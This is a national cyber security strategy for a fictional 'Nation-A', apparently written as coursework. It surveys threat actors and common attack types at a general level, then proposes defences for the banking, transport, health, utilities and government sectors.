Nation-A Cyber Security Strategy Developed by Joshua Fatehnia 4Th May 2018 Version 1 Ref 113524

Nation-A Cyber Security Strategy Developed by Joshua Fatehnia 4th May 2018 Version 1 ref 113524

Contents

1. Introduction ...... 2 1.1. Cyber Warfare ...... 3 2. Vision ...... 5 2.1. Threats ...... 5 2.2. Vulnerabilities ...... 7 3. Response ...... 13 3.1. Cooperative Involvement ...... 13 3.2. Prosecution and Forensic Computing ...... 13 3.3. Training and Education ...... 15 3.4. Government Assurance ...... 15 3.5. Redundancy Options ...... 16 4. Defence Plan Implementation ...... 17 4.1. Banking and Finance ...... 17 4.1.1. Attack Types and Recommendations ...... 20 4.2. Public Transportation ...... 22 4.2.1. Recommendations & Mitigations ...... 24 4.3. National Health Services ...... 26 4.3.1. Mitigations ...... 27 4.4. Public Utilities ...... 29 4.4.1. Mitigations ...... 31 4.5. Government Services ...... 32 4.5.1. Recommendations ...... 33 5. The Tallinn Manual ...... 36 6. Development ...... 37 6.1. Further Documents ...... 38 7. References ...... 40

1 | Page

1. Introduction Nation-A Cyberspace breaks down all physical communication barriers, allowing users to share information over a network no matter the distances between them, this type of virtual environment was not designed with security as it’s forefront in the early stages, as the growing capabilities of cyber developed no one could possibly have imagined that this method of data transportation could be used for negative impacts.

With the increasingly popular use of digital infrastructures in today’s society for the convenience of day to day operations, security is becoming a top priority for citizens and organizations, managing the risks involved in the development of new products and services improves the confidentiality, integrity, and accessibility of data, which is one of the top goals for many organizations operating on the internet.

This Cyber strategy has been published to outline and protect the functioning of national and international foundations, promoting a secure, resilient, and sustainable pathway for the economic values of this nation, whilst doing so, ensure the Confidentiality, Integrity and Accessibility of all user data ensuring the social well- being of the public. National security and resiliency is not just the protection of government intellectual property but the protection of organizations operating within the nation, this plan will also act as a guidance paper for private originations to better protect themselves against an attack.

The UK Government has recently stated that organizations who control critical computer system infrastructures shall be fined up to £17m if they do not have efficient and sufficient cyber security defences, within the strategy, critical sectors have been identified and shall ensure organizations operating within these sectors have the relevant information sustainably to secure themselves. (HMGOV-B, 2018)

2 | Page

1.1. Cyber Warfare Cyber Warfare is a new term that has been established prior to the actual credited use of this type of warfare, it involves the utilisation of offensive and defence operations targeting opponent information systems and networks. There are many different motives that are behind cyber-attacks, but typically these are placed into 3 different categories, Espionage, Sabotage and Propaganda, and although there are plenty of more motivations that can be identified for a cyber-attack, these are the 3 that are defined for international and political movements against a whole nation state. (LILY HAY NEWMAN 2018)

Using online visitation tools such as Norsecorp and FireEye [Fig 1], it can be seen that there are multiple Cyber-attacks happening simultaneously in real-time all around the world, the image below also represents the top 5 targeted industries within the last 30 days.

[Figure 1]

Visualizing the amount of attacks that take place on a daily basis, demonstrates the threat that cyber-attacks can have on an infrastructure, it also becomes very challenging to differentiate what constitutes as an ‘act of war’ under within ‘Cyber- Warfare’ territory, attacks that are politically motivated by another state may indicate hostile activity but, with cases like Stuxnet, if no responsibility it taken by the

3 | Page

actuating party then it becomes difficult to shift the blame onto another state, this is where documents like the Tallinn Manual come in to un-blur the lines between the two.

4 | Page

2. Vision Our overall objective is to support national security and enable a well-functioning, self-sustaining society. The outcome from this strategy is to have a viable plan and solution for those who wish to compromise national security within the next 4 years, protection of the fundamental pillars responsible for the functioning of society need to be protected to protect the nation dynamically, the number of organizations that reported they have suffered a security breach in the past year had risen from 25%, where 7/10 of these attacks involved a virus, spyware or malware. (DR REBECCA KLAHR, 2016)

The primary missions are to

- Defend all critical network, system, and information infrastructures - Prepare the nation’s capabilities to be able to defend against a sizable cyber- attack from foreign actuators. - Provide support and training to civilian personal to bolster awareness and to provide early learners program for the development of future generation.

2.1. Threats There are many potential threats that have proved to have different dynamics for attack, therefore certain groups and individuals need to be identified in order to prepare for effective defence against them. (HMGOV, 2016)

- Cyber Criminals, one of the most common and broadest threat identities to have, the main objective or desired outcome for this group is to develop types of malware or viruses to hack and steal sensitive data for financial gain or to deliberately cause damage to systems in aid of their personal goals. Certain security defence mechanisms have been devised to mitigate some of the within [4] the defence implantation section of this report. - State and State Sponsored attacks, this involves the penetration of a network with motives for political, diplomatic, technological, commercial, and strategic advantage, with primary focuses on government, defence, finance, energy and telecommunication sectors (HMGOV, 2016) . This type of threat is highly regarded as ‘cyber-warfare’, due to the initiation of the attack commonly

5 | Page

belonging to foreign sources. Typically, attacks with this motive have been state sponsored, examples such as the Stuxnet worm, which managed to infiltrate Iran’s nuclear infrastructure and sabotage their Nuclear operations, was suspected to be carried out by US and Isreali operatives, however it has not been confirmed by either party so cannot be regarded as an ‘act of war’. (Schmitt, 2013) (Caso, 2014) - Terrorists, the war against terrorism is nothing new, expectedly, terrorism is become more sophisticated and advanced retrospective with new developments in technology, although traditional terror methods still need to be addressed, a new dynamic of cyber terrorism needs to be prepared for. (ENISA, 2017) - Hacktivists, usually independent induvial or small groups, look to breach networks and expose information typically for personal or societal interests, nature of attacks is mainly to cause disruption for organizations or governments and never usually to cause actual harm, however these types of threats are non-negligible due to the massive danger of losing reputability and reliability in the consumer market. (Ludlow, 2013) - Subordinates, trusted employees within a business or organization are usually the most dangerous due to rights and privileges that some employees have, this can bypass all security measures in place to deter outside attackers. Background checks and ongoing surveillance can mitigate risks against employees looking to act maliciously, however, most often than not, employees compromise their data unknowingly as they have been manipulated to carry out certain things which they themselves think are harmless, this is part of social engineering and Is explain further in the vulnerabilities section [2.2].

6 | Page

2.2. Vulnerabilities A number of vulnerabilities are discovered once they have already been exploited, “99% of exploited VBTs were compromised more than a year after the VBT was published on the internet” (Verizon, 2015), some most common attack vectors have been listed below;

- Social Engineering

Social engineering is unlike any other “tool” or method of gaining information and even access into computer systems, it relies on the attacker interacting with other people that are involved in the network you want to gain access to. Vital information can be gained from this including, but not limiting to topology, IP addresses, passwords, permission structures and computer details. Social engineering has been around for centuries and it is essentially a “con-game” where victims are manipulated into indirectly revealing details to an attacker without them even realising it, the best example of a social engineered attack is the well-known Trojan horse used in the siege of Troy where the Greeks were manipulated into thinking that the horse was a sacred gift that was left behind by the attackers, not to their knowledge it contained a squad of elite soldiers that were placed within the walls. (Rouse .M, 2014) (Peters, 2015)

- Social Engineering (Phishing)

This type of social engineering attack is targeted at many individuals to unknowingly input their valid credentials into a malicious, when infact they are under the impression that they have entering their information into the actual legitimate website, this is because the attackers have copied or ‘spoofed’ the actual website to trick the users, there are several different types of phishing attack;

o Spear Phishing is a type of attack that is created and targeted towards specified individuals, usually with information that is gathered ahead of time, if attackers that can establish whether an individual is a member

7 | Page

of an organization, then they can be targeted with an attack that leads the victim to believe that they are from that organization.

o Clone phishing is an attempt to rewrite, copy or clone a message that the victim had received from the legitimate source moments before, however this is embedded with malicious URLs and attachments tricking the victim into clicking it.

There are a multitude of ways that’s an attacker can use to dupe their victims, some of the typical examples are;

o Link Spoofing . Copying the legitimate link with minor unnoticeable changes, it is always advised to check the link when redirecting to another website.

o Website Spoofing . Usually done hand in hand with cross side scripting, this is where a website is made to look authentic like the legitimate site, even as far as changing the URL.

o Redirecting . This type of attack is carried out at no fault of the victim, when a user clicks on a legitimate website URL, although the URL can be correct, the website has already been compromised and injected with malicious redirect code to unknowingly redirect the user to the malicious website.

- Web Attacks (Denial of Service)

A Denial of service attack in simple terms is where an individual or organization are overloaded with packets resulting in a loss of services they would normally expect to have. Typically, the desired outcomes are to disrupt a service and to damage relations between the consumer and business, although that being the main purpose there are ways of stealing data in this process.

8 | Page

(Rouse. M [B], 2007)

Some of the common attacks are

- Buffer Overflow attacks

o This type of attack occurs when a system tries to hold and process more data than allocated within its memory, by doing this, it allows regular code to be replaced by malicious code and stored in known areas of the system, the Morris worm and Heartbleed bug were 2 examples of this exploit. (MURAT BALABAN, 2013) - SYN Attacks

o A synchronize attack, most commonly known as a SYN flood, is intended to shut down and disrupt services by flooding the systems critical functions with a multitude of high rate SYN packets. It takes advantage of the three-way-handshake process by flooding the TCP ports to connect to the target, whilst doing this, the target system waits for an acknowledgement of the connection, this never arrives and typically is over flooded with connections that are incomplete. (Susan Evans, 2005) - Smurf Attacks

o In this type of attack, an attacker would send PING requests to the broadcast address of a computer network, by doing this, all the hosts on that particular subnet would have received the ICMP packet and would go ahead a send a reply, this is usually to the spoofed victims IP address, done on a large scale the victims computer systems would be overloaded with replies and most often than not shutdown the intended system. (Vangie Beal, 2009)

- Web Attacks (Website code)

One of the most common access points that attackers use is an organizations’ cooperate website, this is due to its availability to be accessed from anywhere around the world making it, commonly, the most

9 | Page

vulnerable part of the network. Some examples of different web attacks are listed below; https://www.rapid7.com/fundamentals/types-of-attacks

o Structured Query Language (SQL Injection) is a programming language that has been developed to manipulate database data, typically when a user enters information on a website to be passed through to the database, it is stored and entered into the database using this language. The way this attack works is to inject malicious code into these inputs in a way to manipulate the system to processes the malicious code in areas where it can do damage, the code injected can allow attackers to do a majority of things including, stealing data and creating a backdoor. (Ping. C, 2017)

o Cross Site Scripting (MAURYA, S., 2015) is where an attacker is able to run their malicious code, that has already been injected into a legitimate website, on an unsuspecting victims machine, depending on the payload it could be used to allow remote root access to the victim machine, access saved cookies to steal credentials from the victim’s machine and much more. Typically, the victims are social engineered to visit the infected websites using ‘click-bait’ links to allow the code to be run on their machines.

- Communication (Man in the Middle)

Man in the middle attacks are typically used to eavesdrop in an end-to-end communication, this can be an efficient method in stealing important information that is being communicated, once a man in the middle persistence has been established, information can also be altered to manipulate the users or systems involved, some of the different types of MITM attacks include; (Rapid7, 2000)

o A rogue access point can be set up by an attacker to trick nearby devices into joining its network, most devices are configured to auto-join a networks with the strongest signal, although this can be

10 | Page

disabled depending on the device, a user can unknowingly connect to a rogue access point meaning that the victim’s network traffic can be monitored. As already mentioned, this type of MITM attack can be mitigated by turning off the WIFI auto join feature on the device.

o ARP spoofing is used by an attacker to replace their own MAC address with the IP address of a host on the target LAN, this then results in traffic that was destined for the legitimate target host, is sent to the machine with the spoofed address, the is typically done by sending an address resolution protocol (ARP) over a LAN to obtain the target IP address. The risk of ARP spoofing can be minimized by using packet filtering across the network and by using ARP spoofing detection software which can identify traffic that appears to be spoofed.

There are a few different methods for carrying out MITM attacks;

o Attackers can use packet sniffing tools like Wireshark and PacketSniff to view incoming and outgoing packets from a particular network interface, this is fairly low level and requires root access to the interface, attackers can also inject their own malicious packets into the communication stream.

o Attackers may read user data that is sent between a victim and a web server to hijack their session by stealing the session cookie, the session cookie is created so that the user can access all the webpages on the server without having to log in each time, if an attacker can get hold of this information using a man in the middle attack, they can act as the target victim.

o SSL Stripping is used when a attacker is already waiting for a request on a victims machine, and alters the response from the server to direct the victim to a HTTP page instead of HTTPS, depending on the scope of the attack, if the user enters login credentials on the HTTP redirect, it can be intercepted by the attacker due to HTTP vulnerabilities.

11 | Page

MITM has been around for a long time now and certain preventative measures have been developed to mitigate the risk of this attack; (RICKY PUBLICO, 2017)

o Secure/Multipurpose internet mail extensions have been developed to make sure that during transition of emails, that they are fully encrypted and near impossible to read if intercepted.

o Communication with Authentication Certificates ensures that in an SSL handshake, only those who have been authenticated by the certificate are able to access that information on the server, the server will only recognise valid client certificates.

o HTTPS was developed by Netscape communications in 1994 and formally used in 2000, it was implemented to upgrade the current HTTP protocol which made no use of secure channel SSL/TLS certificates, this allows a secure communication channel between end user and web server.

12 | Page

3. Response

3.1. Cooperative Involvement Investigating partnerships to help form the global cyber environment and give a wider more expansive view of cyber threats, expertise sharing. Support market forces to raise cyber standards working with public and private sectors to ensure that individuals, businesses, and other organizations can adopt the appropriate behaviours.

Alongside working with other nation states to develop cyber knowledge, it is important that there is a cooperative movement within the countries industries itself, organizations are encouraged to work with Internet Service Providers (ISPs) and Cloud Service Providers (CSPs) to make it harder to attack virtual infrastructures of Nation-A, this can also encourage the scale of cyber protection campaigns for local governments to promote support for smaller organizations.

3.2. Prosecution and Forensic Computing

It can be very difficult to firstly, identify the individual or parties who are responsible for the attacks and secondly, to find the evidence to support the prosecution of these individuals.

Different techniques are adopted with the use of tools that have been developed to track and to find the source of certain traffic, these are all dependant on the type and size of the attack, along with the forensic data collected. It is important to correctly analyse the bigger picture and not just the isolated event, as it is very likely that the attack had been planned for a period and several reconnaissance methods had been adopted to collect the relevant information. With sophisticated attacks, finding the digital footprint of the attackers is usually impossible if they have taken the appropriate steps to minimize being tracked. (Glance 2015)

Fileless attacks offer an attacker a pathway of attacking a system, whilst at the same time remaining undetectable, it is likely that this type of attack is used with state and

13 | Page

state-sponsored interests due to the sophistication and importance for anonymity. (ENISA, 2018)

The first thing that needs to be established when trying to source an attack is where the piece of malware has ended up and which vulnerabilities were gain access into the network, assuming that the target network was breached, for other attacks such as DDOS and non-penetrative attacks, the target of the attack will still need to be identified. Following is a list of some of the typical entry points that could be used to inject into a target network; (Rapid7, 2000)

- Malware

o CD/DVD o USB o Email Attachment o Internet Downloads - Phishing

o Emails o Phone Calls o Letters o Web Popups - Web Attacks

o SQL Injection o Cross Side Scripting o Denial of Service o Session Hijacking

When the entry point has been established it can make it easier for authorities to identify how that particular vulnerability was exploited, whether it was an employee downloading an attachment or part of the network had been compromised, looking at log entries, emails sent, Wireshark, to see if there are any leads. Now if the attack was sophisticated enough there should be would be nothing left being, however knowing the cause can be beneficial for the victim to act appropriately to mitigate the same happening again.

14 | Page

3.3. Training and Education

Training and educating the newer generation for cyber defence is extremely important in terms of creating a sustainable environment, according to the Security Breaches Survey undertaken In the UK “Just under a 5th of businesses had their staff partake in cyber security training this year” (DR REBECCA KLAHR, 2016), this figure needs to be drastically increased for the movement aiding cyber awareness and the improvement of employee practice.

3.4. Government Assurance

Government to distribute a plan for equipment distributors to ensure that all their equipment is ‘secure by default’, this is to ensure that when an organization purchases information system equipment, it already arrives secure and proactively ensures that the user changes the default settings to harden devices, this can involve;

- Setup wizards to customize passwords (SSH, Console, Administrator…) - Notification of out of date software - Notification of out of date hardware

According to the Cisco 2016 Annual Security report 115000 Cisco devices were shortlisted then analysed which revealed that 106000 of those devices were running old software which had known vulnerabilities to them. (Cisco, 2016)

New market products to be monitored and perused to add ‘security ratings’ to each, this can be a good comparison indication for potential customers.

It is vital that governments have distribution for the best cyber security practices, underpinning the core functionality, organizations seek to adhere to

15 | Page

the same policies, governments systems hold large quantities of sensitive data and extra precautions need to be taken;

Objectives

- Establishing confidence in using Services - Expiration of legacy systems - Public access rights - Adhere to cyber security standards and regulations

Approach

- Online infrastructure - Ongoing funding for system hardware - Increased cyber awareness training - Threat analysis for new technologies

3.5. Redundancy Options For a stable and progressive economic environment, it is vital that organizations within their individual sector work towards having a plan to fall back on when dealing with threats, without these redundancy options, it makes it difficult for the nation to move forward together.

Like the individual organizations, the nation itself requires a collected redundancy plan in the event of a total breakdown of internal services, with the likelihood of future wars being conducted cyber platforms (MACASKILL, E., 2018), Nation-A needs to ensure that an effective redundancy is in place in case of an attack from another state.

16 | Page

4. Defence Plan Implementation

4.1. Banking and Finance Internet banking fraud is a growing problem that needs to be addressed within today’s society, fraud within this sector grew by 64% to £133.5m in 2015 with the growing trend of targeting a smaller quantity of large high-end – high-net businesses become extremely popular because of the pay-out. (HMGOV, 2016)

Ovum conducted a study for the predicted spend allocation of ICT services within the banking sector, it was predicted that the top 1,000 retails banks in the US would spend $124b on ICT functions, with the top 10 occupying $3.1b of that share (Daniel Mayo, 2017). Also shown is the allocation of spend by the top 1000 for each business function, with security and fraud management being in the top 3 biggest expenditure in that sector of the business. This study is a big indicator where security and fraud detection should be placed when prioritizing different functions.

(Daniel Mayo, 2017)

17 | Page

Large banking and finance organizations are now creating a larger digital presence with a lot of their services moving online, and the amount of sensitive data that is transferred over the internet us becoming more common. Currently, most internet banking providers are digitally sound, knowing a data breach and the loss of data could be catastrophic. Research from Ovum, expected US banks to become more aware of the problem and consequently raise their IT security budgets by 4.3% (Penny Crosman, 2014) compared to the year before, they had also surveyed up to 500 different banking firms to prioritize their focuses for the next 18 months, the 2 most common shared interests were mobile banking and online banking.

(Penny Crosman, 2014)

18 | Page

As already mentioned, organizations within the banking and finance sector must pay particular attention to digital security due to the amount of confidential data that is being handled, many of the methods used to gain access into a network and manipulate data requires a certain degree of social engineering [2.2]. There must also be a primary focus on employee practice to prevent data breaches due to human error, which is the most common cause of data breach incidents, where 90% if recorded attacks had been initiated from some form of employee intervention. (Institute, IM 2016)

Some of the most common ways hackers use to gain valuable information by using unaware employees are, but not limited to

- Phishing - Fake emails - Physical Entry (USBs, CDs, DVDs) - Downloads

In a lot of these cases, these can be mitigated with thorough employee training and good practice examples, if employees have been made aware of these types of attacks, it is likely that most of them will avoid doing these things. This is especially critical within the banking and finance sector, as this may be the only way someone can initiate an attack, due to the heavy investment in online security.

Cornerstone’s benchmark study revealed that businesses were spending 29% more on fraud detection in 2014 compared to the previous year, this is due to the massive influx of payments without having the physical card itself to hand. (Conerstone Advisors, 2014)

The same study also collected information on what type of interaction services are offered to customers in 2013 compared to 2010, the figure shows a rise in secure personal chats and a reduction in ‘open to all’ information, this is due to the restrictions in the use of social media and third party communication services, consumers feel much more comfortable to chat directly to the vendor.

19 | Page

(Conerstone Advisors, 2014)

With these types of communication methods becoming more popular, organizations need to set aside more of the security budget to ensure that these channels are as secure as possible and the information that is being transferred cannot be read by foreign users.

4.1.1. Attack Types and Recommendations As mentioned before, gaining access into a Bank’s network and being able to compromise data or steal recourses is nearly impossible to do without planning and reconnaissance prior to implementing it. Examples like the Bangladeshi online ‘bank heist’ where just over $100 million was stolen from the bank, demonstrates the amount of planning that went into place to successfully initiate the attack, firstly, this attack was carried out using the legitimate SWIFT credentials with legitimate transfers to avoid arousing suspicion and malware had been installed on the relevant machines to avoid detecting suspicious activity (Kim Zetter, 2016). This was not a traditional ‘hack’ but involved various stages leading up to the attack, installing the malware and getting hold of the credentials would have involved the cooperation for employees, it was indicated, that at the time, the bank networks did not have firewalls, which could have raised the possibility of a breach and thus, allowed the hackers to install the malware that stopped the process to stop the SWIFT transactions being automatically printed which allowed for the transfers to be undetected until later on.

Vulnerabilities in this case were

- Inability to prevent malware from being installed onto systems - Inability to detect malware that had been installed onto systems

20 | Page

- Lack of staff background checking - Lacking of good employee practice and training

Recommended improvements

- Implementation of hardened firewall - Update Anti-Virus - IDS/IPS implementation - Thorough background checking and training

Its not only the employees that need to be aware, attackers may attack high value individuals or carry out a large scale attack on groups of customers to steal individual account data, this is largely done using social engineering to manipulate the user to give away their login credentials to a fake source unknowingly.

Phishing attacks are widely used in this sector as mentioned, some of the steps that can be taken to minimize these risks include;

- Relevant awareness and training for employees and genera public - Removal of all incoming files, ensuring that they are inspected before being available to download - Filtering

Lucy security simulation is a testing and simulation platform, which allows users to create their own scenarios and act appropriately do the individual threats that it offers, it is a unique tool that can be used by all sized organizations to test their resilience against cyber threats both on the network and employee practice. Multiple campaigns can be set up simultaneously, which can allow the admin to check the progress of each one without interrupting the progress of another campaign (OLIVER, 2015), network administrators may utilize the tool to test relevant computer systems and employees.

21 | Page

4.2. Public Transportation

The public transportation industry is one of the most underrated when considering cyber security, previously, the infrastructure was built upon closed and easily manageable systems where only selected users had availability to access the closed networks, this has resulted in poorly managed foundations that are moving towards a more digitalized and ‘smart’ way of travelling which is not sustainable.

With the recent digitalization and connectivity of transportation services, these services are becoming susceptible to attacks, many state nations are reacting to t develop their defence in order to increase stability, mentioned in ABIs Research of the increase for Cybersecurity spending on transportation in the USA, the operational spend is increasing from $8 Billion to $14 Billion by 2022 to embrace the modernization of all services across the board within this industry. (API Research, 2017).

Outlined in Cisco’s 2017 midyear cyber security review (CISCO, 2017), 180 security officials working in the transportation industry around the world were questioned on whether they were aware and which types of threats they were expecting on the current infrastructures, it was revealed that just over 60 of them prioritized advanced persistent threats when considering the current state of industry technologies, an APT is regarded as breach that has been undetected for a long period of time, the rest of the professionals that were interviewed said that mobile devices and the evolution of cloud computing provided a growing threat for the industry. Many of the interviewees admitted that these threats could be mitigated if given enough time, however, 35% of them mentioned that they receive thousands of security alters daily, where on average, only 19% of them are legitimate with only 30% of them being fixed.

Many cities have adopted more complex transportation systems which results in modern travelling becoming more reliant on the functionality of these systems, these can include; traffic lights, sensors, networks for public transportation. With this, comes an attraction for cyber criminals, they can not only attack the information systems to steal and destroy critical data, they may be able to control operational systems of an entire city and disrupt the whole operation of the city, potentially bringing it to a standstill depending on the scope of the attack, much of the data that

22 | Page

is stored can be used to track the location of physical assets and all interconnected information such as flight paths and automotive control systems. An example of this was the cyber-attack of July 2013 where all passport control systems were hacked into and disrupted at Istanbul Central airport, cause major passenger delays as they were not allowed to enter the country without the systems verification, also in Poland where a TV remote was altered to change track points and allowed it to control the Tram control systems in Lodz. (Marsh, 2015)

Due to the growing nature of the services that are being provided in this industry, there is a rapid demand for talented individuals that have a wealth of knowledge and experience, the rate of growth is outgrowing the amount of trained staff there are for the jobs available particularly within this sector, due to the lack of experience in industry specific threats and employee practices that are unique within the transportation industry.

Public WIFI is a growing trend, especially when looking at Public Transport services, according to the Itrc (Identity threat recourse centre) public WIFI usage in the UK had increased by 240% since 2011 to 2012 and, out of the 377 initial responses, 78% of people had regularly used public WIFI hotspots (ITRC,2012), bearing in mind this survey was taken in 2012 when the uprising of public WIFI was gaining attention, the amount

23 | Page

of users using the internet has nearly doubled from 2012 (2.336 Million) to 2017 (41.157 Million) correlating with Public transport WIFI usage (Miniwatts, 2017).

Depending on the sophistication of Public Wifi networks, it can be an access point for hackers to steal information from users/employees that are connected to it or to use it as a tool to ‘Socially engineering’ other attacks, a dictionary attack is one of the simplest ways to gain access to a WPA2 Wifi network, especially if the default credentials have not been changed.

4.2.1. Recommendations & Mitigations There should be a development of frameworks that already exist, implementation of NIST standards to update and bolter the policies than are in place to protect against foreign actuators, managing bodies that are regulating these organizations need to establish an effective risk governance to engage and most importantly be aware of the industry specific attacks. Effective incident response plans need to be implemented to ensure that, in the event of a cyber-attack, all critical systems and data can be closed off and safe guarded until the threat has been dealt with, this includes cutting off all control systems to physical assets and having means of alternative control if primary controls have been exposed, (Consultation -> Risk Analysis -> Implementation).

Self-driven vehicles is a small part of the transportation sector that now needs to be incorporated in relation to security, the National Highway Traffic Safety Administration (NHTSA) have conducted research relating to the security and defence systems of automobiles, their aim is to enhance road safety and being down the number of crashes that are caused by human error with the implementation of sensors and emergency braking systems, however by doing this, they have also factor the cyber security challenges that this poses. Some of the practices that they have introduced allow the organization to go ahead with their research whilst tackling the cyber security issues alongside it, these can be used for nearly all automated transportation services;

- Isolation of critical control systems

24 | Page

o In the event of a successful attack, critical systems that are responsible for the safety of the individuals within the system are protected and do not allow any external threat control of these systems, this typically results in a force system shutdown to prevent the manipulation of controls. - Real-Time Detection - Real-Time Response - Analysis and rectification of exploits

25 | Page

4.3. National Health Services Health services are likely targets due to the importance and urgency of the information that is stored, upwards of 16 million records were stolen from national health organizations in the US in 2016 (MYRSINI ATHINAIOU, 2017), in the same year is was reported that healthcare was 5th most targeted industry according to the IBM X- Force Threat Intelligence Index 2017, it also shows that percentage of attacks within the healthcare sector are dominated by insiders exposing critical systems without any knowledge, however this is shown to be decreasing, it is likely to be a direct result from employee training and practice standards. (IBM Issues 2017)

(IBM Issues 2017)

It is clear to see that ransomware attacks are mostly inherited from these types of attacks, employees are typically unaware that they are injecting malicious code into the systems and compromising critical data, however, data is not the only target for many attackers, examples of the altering of electronic organs and exploiting scanning machines have been seen before, and depending on the motive of the attacker, worst case it can potentially result in death. (Johns Hokins, 2015) (BBC NEWS, 2015)

26 | Page

A big example of a recent ransomware attack is the NHS battle against ‘Wannacry’, it locked and encrypted user data demanding a random to be paid out in bitcoin to release the data, as mentioned before this would have resulted from some form of phishing attack to gain persistence in the network, whilst at the same time going unnoticed and spreading to other parts of the network, a back-door is also created to allow the attackers to stay connected in event of a software update, (a backdoor is a method of bypassing normal security authentication methods by creating a persistence in the target network).

4.3.1. Mitigations For an organization, ransomware involves the infection of information systems in terms of servers and workstations, infection itself can take place with many different methods, there are different mechanisms an organization can implement to stop their systems getting infected to prevent the attack before it has even started, different methods of gaining access to a target system have been identified and mitigations highlighted in section [2.2] of this plan.

Preventing a breach is ideally what an organization would like to achieve, however this is not always possible, certain mechanisms can be implemented to ensure that the risk of experiencing a ransomware attack can be minimized;

- Permissions and rights

o Organized ransomware usually targets shared folders due to being shared across multiple workstations and most impactful, it was revealed, in the 2017 Varonis data risk report, that 20% of workstation folders where able to be accessed by all users across the participating organizations, the means that any user could be targeted to infect that portion of the data. Organizations should limit the amount of data that each user has access to, to only that of what is required for their job role to minimize the amount of data that is affected if that user’s workstation and credentials are breached. (VARONIS, 2017) - Code Execution policy (Macros)

o It is good practice for network administrators to prevent the execution of code that has not already been trusted previously, code that has not

27 | Page

been authorised cannot be run and will deter the ransomware execution, organizations can prevent the use Macros (automation of repetitive code) so that the ransomware cannot execute repeatedly to encrypt large amount of data.

o However, policies need to be established to ensure that legitimate code that is required to be execute is done so, a balance needs to be identified. (NCSC, 2016) - Removable Media Control

o Controlling what types of removable media can be installed onto the machines will prevent the risk of malicious devices being installed unessentially by employees or by malicious individuals.

There is a number of different software platforms that can be used to protect an organization against ransomware attack, both opensource (free) and licenced software, it is advisable for at least one of these, or another ransomware prevention software, to be installed and running on corporate machines;

- HitmanPro.Alert (Licenced)

o Behavioural technology o Cloud scanning - MalwareBytes

o Ransomware Protection o Malware & Virus o Web Protection - Watchpoint Cryptostopper (Licenced)

o Behavioural technology - Zemana

o Anti-Malware o Cloud Scanning - EMET (Free)

o Certification scanner o Execution policy manager

28 | Page

4.4. Public Utilities Public utility service providers are massive targets, typically, for those looking to damage company reputation and disrupt public well-being, hacktivism and state/state sponsored motives are commonly linked with ‘disruption tactics’, making this industry a prime target.

DDOS attacks are a convenient and a low risk method to disrupt a victim’s service application with limited recourses to hand, the majority of the attacks that have been seen before utilities amplifiers to boost their traffic, whether this is organised or manipulating unknowing machines.

Verizon’s 2014 data breach investigations report, had undergone a study in which was revealed that 14% all cyber-attacks involving utilities included some form of DDOS attack in it, (Verizon, 2014) in the same report is stated that the utilities industry was fifth in line for the most data breaches and stolen information in 2013.

Utility company’s need to be vigilant and aware of the threats that now face their sector specifically with the evolution of DDOS attacks. (SAHBA KAZEROONI, 2015)

- The amount of bandwidth that is now available to an individual computer system is massive compared to what it was a few years ago 1gb/s being a typical value that would have been recorded previously, now more recently GitHub had experienced its own DDOS attack enduring 1.35 terabits per second of traffic shutting down the Github services for nearly 3 days (LILY HAY NEWMAN (b), 2018), this attack did not make any use of a traditional botnet network but used Memcached server to amplify the amount of traffic that was sent.

29 | Page

This not only displays the figurative value of how powerful DDOS attacks have become but the indication towards the kind of hardware that is being used, as more attacks are being introduced legacy equipment is being surplus and organizations need to keep upgrading to match the development of new attacks. (SAHBA KAZEROONI, 2015) - When a certain product or service becomes mainstream in the eyes of the public, it starts to become commercialized and this is evident with the capabilities of DDOS attacks, relevant services and botnets (multiple of infected computers) are being rented out to those who want to attack a target victim easily (Average $25/h) (JOHN LEYDEN, 2017) , this means that nearly everyone with internet access is able to pay to conduct a DDOS attack with serious power and minimal recourses themselves. - As mentioned, DDOS attacks are rarely the type of attacks used for financial gain, however with the evolution of cyber threats, attackers are now using DDOS capabilities for cyberextortion schemes, hereby where the attackers can keep a service down whilst demanding a financial ransom to stop the attack and allow the company to resume their services as normal (46% of all criminalized recorded DDOS attacks are being used in that manner) (ZEIFMAN, I., 2015), this type of cyber-attack is extremely effective against organizations within the utilities industry, this is because, it is often less costly for them to just pay the

30 | Page

ransom that spending the money to recover and salvage the current situation and not to mention the damage that can be done to the reputation of the organization.

4.4.1. Mitigations There are several steps that can be put in place at a managerial level to minimize the risk and deter DDOS attacks affecting the operations of the business;

(SAHBA KAZEROONI, 2015)

- Primarily, a policy or plan needs to be implemented to ensure that the business is prepared for an eventuality of a DDOS attack, this will include thresholds for different actions that are applicable for the situation, (eg how long the business should wait before paying a ransom), how operations will go about when services are under attack and not available and what control systems are put in place (backups etc…) with how they should be used. - Organizations need to establish what is DDOS would look like on their systems specifically, this can be done by simulating an attack on their physical systems to allow a benchmark and other variables to be created, this is typically known as black-box testing, along with creating relevant benchmarks, it can also indicate areas in which can be protected further, thus, deterring future attacks by making it harder to successfully perform a DDOS, doing this can also save time when trying to identify what the issue is in the early stages. - It is advised for businesses to have their go-to contacts ready ahead of time to ensure that there is an option available to fall back on to damage control and deter the attack, this not only applies to technical staff, but also to legal advisories who can give recommendations and advice moving forward. - It is advised that organizations have their systems covered by Cyberinsurance, this can aid in the recuperation and recovery stage after a successful attack.

31 | Page

4.5. Government Services Government critical systems are commonly targeted due to their monumental importance to a functioning economy, services such as benefits, waste management, public CCTV surveillance, housing and administration only scratches the surface for how largely these are dependent on these critical systems.

Fileless attacks are becoming more of a trend aiding in avoiding forensic detection and traceability, with the amount of fileless malware attacks growing at a rate of about 10% in 2016, the attack is essentially undetectable and leaves little to no trace due to there being no malicious software installed onto a victim’s system (MARIA KOROLOV, 2017), resulting in most modern antivirus systems not detecting a breach, the Ponemon Institute’s Endpoint Security Report states that within that year, 54% of companies experienced some form of attack that compromised data and IT infrastructure, which 77% of those, were reported to have utilized fileless techniques. Use of tools that are already integrated on operating systems such as, PowerShell or WMI, allow attackers to run scripts without creating too many new files on the hard disk, doing this, makes it more difficult for traces to be identified as the scripts that have already been created can be executed directly from the memory. (CANDID WUEEST, 2016)

32 | Page

(BARKLY, 2017) [Fig 7.8A]

(CANDID WUEEST, 2016) [Fig 7.8B]

4.5.1. Recommendations Fileless attacks, although being around for just over a decade, have only recently been efficiently utilized by attackers, currently there is no set strategy in preventing these types of attacks, however methods have been developed to detect and deter these types of attacks, monitoring platforms allow admins to effectively overview and

33 | Page

diagnose their networks whilst also being able to identify symptoms of this type of attack, some organizations that offer this service are;

- Cybereason’s automation detection tool, it’s main function is to investigate different patterns and correlates past and present activities whilst analysing real time using machine learning algorithms. (PAUL STAMP, 2017)

